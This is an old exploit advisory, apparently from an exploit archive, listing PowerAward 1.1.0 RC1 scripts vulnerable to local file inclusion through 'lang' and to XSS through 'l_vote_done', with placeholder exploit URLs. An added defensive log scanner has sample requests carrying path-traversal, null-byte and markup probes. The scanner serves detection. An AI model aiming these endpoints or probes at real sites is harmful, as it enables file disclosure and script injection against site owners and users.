Exploit for unknown platform in category web applications
===============================================================
PowerAward 1.1.0 RC1 (LFI/XSS) Multiple Remote Vulnerabilities
===============================================================
-------------------------------------------------------------------------------
                               C r a C k E r
            T H E   C R A C K   O F   E T E R N A L   M I G H T
-------------------------------------------------------------------------------
        From The Ashes and Dust Rises An Unimaginable crack....
-------------------------------------------------------------------------------
                      [ Local File Include ] [ XSS ]
-------------------------------------------------------------------------------
 Author           : CraCkEr
 Group            : uNiTeD CraCkiNg ForCE
 Script           : PowerAward 1.1.0 RC1
 Download         : SourceForge.net
 Method           : GET
 Critical         : High
 Impact           : System access
 Register Globals : [-] ON  [ ] OFF
 DALnet #crackers
-------------------------------------------------------------------------------
 Release Notes:
 =============
 Typically used for remotely exploitable vulnerabilities that can lead to
 system compromise.
-------------------------------------------------------------------------------
                               Exploit URLs
-------------------------------------------------------------------------------
[LFI]
http://localhost/path/agb.php?lang=[LFI]
http://localhost/path/angemeldet.php?lang=[LFI]
http://localhost/path/anmelden.php?lang=[LFI]
http://localhost/path/charts.php?lang=[LFI]
http://localhost/path/external_vote.php?lang=[LFI]
http://localhost/path/guestbook.php?lang=[LFI]
http://localhost/path/impressum.php?lang=[LFI]
http://localhost/path/index.php?lang=[LFI]
http://localhost/path/rss-reader.php?lang=[LFI]
http://localhost/path/statistic.php?lang=[LFI]
http://localhost/path/teilnehmer.php?lang=[LFI]
http://localhost/path/topsites.php?lang=[LFI]
http://localhost/path/votecode.php?lang=[LFI]
http://localhost/path/voting.php?lang=[LFI]
http://localhost/path/winner.php?lang=[LFI]
[XSS]
http://localhost/path/external_vote.php?l_vote_done=[XSS]
Notes: More files are affected!!
=====
-------------------------------------------------------------------------------
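Added example (not part of the original advisory and not PowerAward code): a log check that flags requests carrying unexpected values in the lang and l_vote_done parameters named above, so defenders can find probing of these endpoints in web server logs. The allowlist pattern for language values, the sample log lines and the script name other.php are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory lists for the `lang` parameter (without ".php").
LISTED = set("""agb angemeldet anmelden charts external_vote guestbook impressum
index rss-reader statistic teilnehmer topsites votecode voting winner""".split())

# Assumption: a legitimate language value is a short plain token, so anything
# with dots, slashes, NUL bytes or leftover %-escapes fails the allowlist.
SAFE_LANG = re.compile(r"[A-Za-z0-9_-]{1,32}")
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def findings(line):
    """Return (parameter, script, listed_in_advisory) tuples for one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    listed = script.endswith(".php") and script[:-4] in LISTED
    params = parse_qs(url.query)  # decodes %XX escapes exactly once
    hits = []
    # The advisory notes that more files are affected, so check `lang` everywhere.
    if any(not SAFE_LANG.fullmatch(v) for v in params.get("lang", [])):
        hits.append(("lang", script, listed))
    if script == "external_vote.php" and any(
            MARKUP.search(v) for v in params.get("l_vote_done", [])):
        hits.append(("l_vote_done", script, True))
    return hits

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /path/index.php?lang=de HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /path/charts.php?lang=..%2F..%2Fconfig HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /path/external_vote.php?lang=en&l_vote_done=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 800',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /path/other.php?lang=%2500 HTTP/1.1" 200 64',
]

def scan(lines):
    return [hit for line in lines for hit in findings(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the check is an allowlist on the decoded value, double-encoded input is flagged as well: the leftover percent sign fails the pattern.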
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
-------------------------------------------------------------------------------
                             © CraCkEr 2008
-------------------------------------------------------------------------------
# 0day.today [2018-01-08] #